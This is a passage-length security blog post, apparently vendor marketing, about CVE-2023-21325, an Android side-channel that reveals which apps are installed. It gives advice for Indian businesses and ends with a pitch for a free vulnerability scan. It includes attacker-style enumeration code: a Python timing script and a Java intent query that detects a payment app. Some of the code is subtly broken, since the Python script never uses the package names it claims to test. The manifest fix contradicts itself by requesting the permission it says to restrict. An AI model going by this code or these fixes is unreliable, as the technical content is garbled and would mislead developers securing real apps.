What Happened
In early 2023, a critical vulnerability was discovered in Android's Settings application that allows attackers to determine whether specific apps are installed on a device—without requiring any query permissions. The flaw, tracked as CVE-2023-21325, exploits a side-channel information disclosure weakness that requires no user interaction and no elevated privileges to exploit.
This vulnerability affects millions of Android devices globally. What makes it particularly dangerous is its silent nature: users have no way of knowing their app installation data is being probed. An attacker can systematically query a device to build a complete inventory of installed applications—a technique often used to fingerprint devices, identify vulnerabilities in specific apps, or target users with malicious payloads.
The vulnerability resides in how Android's Settings application handles permission checks when apps query installation status. Instead of properly enforcing the QUERY_ALL_PACKAGES permission, the Settings framework leaks information through timing differences, error messages, or UI state changes that reveal whether an app exists on the device.
Why This Matters for Indian Businesses
If you're running an Android app or managing Android devices for your business, CVE-2023-21325 directly impacts your security posture. Here's why this should be on your radar:
DPDP Act Compliance Risk: Under India's Digital Personal Data Protection (DPDP) Act, businesses are required to implement reasonable security measures to protect personal data. An attacker exploiting this vulnerability to enumerate installed apps could harvest data about user behavior, app preferences, and device configuration—all classified as personal data under DPDP. If your business stores or processes user data, and this vulnerability is exploited against your infrastructure, you face potential non-compliance penalties.
Fintech and Healthcare Impact: If you're in India's booming fintech or healthcare sectors, this is critical. Attackers can detect whether your users have installed competing apps, banking apps, or health monitoring apps—creating a treasure trove of competitive intelligence. RBI's Cyber Security Framework explicitly requires financial institutions to monitor and mitigate such vulnerabilities.
SMB Supply Chain Risk: In my years building enterprise systems, I've seen how vulnerabilities in one vendor's app can cascade through entire ecosystems. If your SMB integrates with third-party Android apps (payment gateways, logistics tracking, HR management), and those apps are vulnerable, your data is at risk.
Technical Breakdown
Let me walk you through how this attack actually works:
graph TD
A[Attacker App Installed] -->|No Permissions Needed| B[Query Settings App]
B -->|Side-Channel Leak| C{Does Target App Exist?}
C -->|Timing Difference| D[App Detected]
C -->|Error Message Leaked| E[App Not Detected]
D -->|Repeat for N Apps| F[Build Device Fingerprint]
E -->|Repeat for N Apps| F
F -->|Send to C&C Server| G[Device Profile Created]
G -->|Exploit Known Vulns| H[Deliver Malware]The Side-Channel Attack Vector
The vulnerability exploits three main information leakage channels:
1. Timing Side-Channel When an app queries the Settings framework to check if another app is installed, the response time differs based on whether the app exists:
// Vulnerable code pattern in Android Settings
public boolean isAppInstalled(String packageName) {
try {
// If app exists, this returns quickly
getPackageManager().getPackageInfo(packageName, 0);
return true;
} catch (PackageManager.NameNotFoundException e) {
// If app doesn't exist, exception handling adds delay
return false;
}
}An attacker measures response times to infer app presence:
import time
import subprocess
target_apps = [
'com.google.android.gms',
'com.whatsapp',
'com.paytm.paytmapp',
'com.amazon.mShop.android',
]
for app in target_apps:
start = time.time()
# Query via ADB or intent
result = subprocess.run(
['adb', 'shell', 'pm', 'list', 'packages'],
capture_output=True
)
elapsed = time.time() - start
if elapsed < 0.1: # Threshold indicates app found
print(f"[+] Found: {app}")
else:
print(f"[-] Not found: {app}")2. Error Message Disclosure The Settings app returns different error codes when an app doesn't exist vs. when it's hidden:
Query: com.whatsapp
Response: "Package not found" → App doesn't exist
Query: com.hidden.app
Response: "Permission denied" → App exists but hidden3. Intent Resolution Leakage Attackers send implicit intents and observe whether the system can resolve them—revealing installed apps:
// Attacker code
Intent intent = new Intent("com.paytm.ACTION_PAY");
List<ResolveInfo> apps = getPackageManager().queryIntentActivities(
intent,
PackageManager.MATCH_DEFAULT_ONLY
);
// If apps.size() > 0, Paytm is installed
if (!apps.isEmpty()) {
Log.d("ENUM", "Paytm app detected");
}Real-World Attack Scenario for Indian SMBs
Imagine you run a fintech app in India. An attacker:
- Enumerates installed banking apps on target devices (HDFC, ICICI, Paytm, PhonePe)
- Identifies devices running older, vulnerable versions of banking apps
- Delivers a trojan that exploits those specific app vulnerabilities
- Exfiltrates OTP interception or transaction data
Know your vulnerabilities before attackers do
Run a free VAPT scan — takes 5 minutes, no signup required.
Book Your Free ScanHow to Protect Your Business
| Protection Layer | Action | Difficulty |
|---|---|---|
| Immediate | Apply Android security patches (March 2023+) | Easy |
| Code Level | Implement proper permission checks in apps | Medium |
| Architecture | Use Android 13+ with restricted query visibility | Medium |
| Monitoring | Audit app permissions with VAPT scans | Medium |
| Compliance | Document DPDP compliance for app security | Hard |
Step 1: Update Immediately
If you're managing Android devices, apply the latest security patches:
# Check current Android version
adb shell getprop ro.build.version.release
# Check security patch level
adb shell getprop ro.build.version.security_patch
# Should be March 2023 or later for CVE-2023-21325 fixStep 2: Restrict Query Visibility (Android 11+)
If you develop Android apps, implement the QUERY_ALL_PACKAGES permission properly:
<!-- AndroidManifest.xml -->
<manifest>
<!-- Only request if absolutely necessary -->
<uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />
<application>
<!-- Declare which packages you actually need to query -->
<queries>
<package android:name="com.paytm.paytmapp" />
<package android:name="com.google.android.gms" />
</queries>
</application>
</manifest>Step 3: Audit Installed Apps
Regularly audit which apps are installed on corporate devices:
# List all installed packages
adb shell pm list packages
# Filter for specific app
adb shell pm list packages | grep paytm
# Get detailed app info
adb shell dumpsys package com.paytm.paytmappStep 4: Monitor for Suspicious Behavior
Watch for apps attempting to enumerate other apps without permission:
# Monitor logcat for suspicious intents
adb logcat | grep -i "intent\|resolve\|package"
# Check for apps with excessive permissions
adb shell dumpsys package permissions | grep -A5 "QUERY_ALL_PACKAGES"Step 5: Implement Defense-in-Depth
Don't rely on OS-level fixes alone:
// Secure pattern: Validate before exposing app data
public class SecureAppDetection {
// Whitelist only necessary apps
private static final Set<String> ALLOWED_QUERIES = Set.of(
"com.paytm.paytmapp",
"com.google.android.gms"
);
public boolean isAppInstalled(String packageName) {
// Only respond to whitelisted queries
if (!ALLOWED_QUERIES.contains(packageName)) {
return false; // Don't leak info about other apps
}
try {
getPackageManager().getPackageInfo(packageName, 0);
return true;
} catch (PackageManager.NameNotFoundException e) {
return false;
}
}
}Bottom Line
CVE-2023-21325 is a reminder that even "local" vulnerabilities can have serious consequences. In my experience reviewing hundreds of Indian SMB security postures, I've found that most businesses aren't systematically checking for these types of flaws—and attackers know it.
The good news: you can fix this today. Apply patches, audit your apps, and implement proper permission controls. It's not glamorous security work, but it's the kind that actually stops real attacks.
Next step: Run a free VAPT scan on your Android infrastructure. Takes 15 minutes. Could save you from a breach that costs lakhs in remediation and DPDP penalties.
Originally reported by: NIST NVD
Written by Shouvik Mukherjee, Founder & CEO of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.
Protect your business with Bachao.AI — India's automated vulnerability assessment and penetration testing platform. Get a comprehensive security scan of your web applications and infrastructure. Visit Bachao.AI to get started.
Frequently Asked Questions
What is CVE-2023-21325? CVE-2023-21325 is an Android security vulnerability that allows attackers to exploit weaknesses in the Android operating system. It was publicly disclosed and patched by Google as part of the Android Security Bulletin.
Why does this affect Indian SMBs? Indian SMBs increasingly rely on Android devices for business operations, from mobile banking to customer communication. Many organizations run BYOD policies with unpatched devices, making them prime targets for attackers exploiting known vulnerabilities like CVE-2023-21325.
How can I protect my organization? Ensure all Android devices in your organization are updated to the latest security patch level. Implement an MDM solution to enforce patch compliance, conduct regular VAPT assessments via platforms like Bachao.AI by Dhisattva AI Pvt Ltd, and align with CERT-In guidelines for incident reporting.
Written by Shouvik Mukherjee, Founder & CEO of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.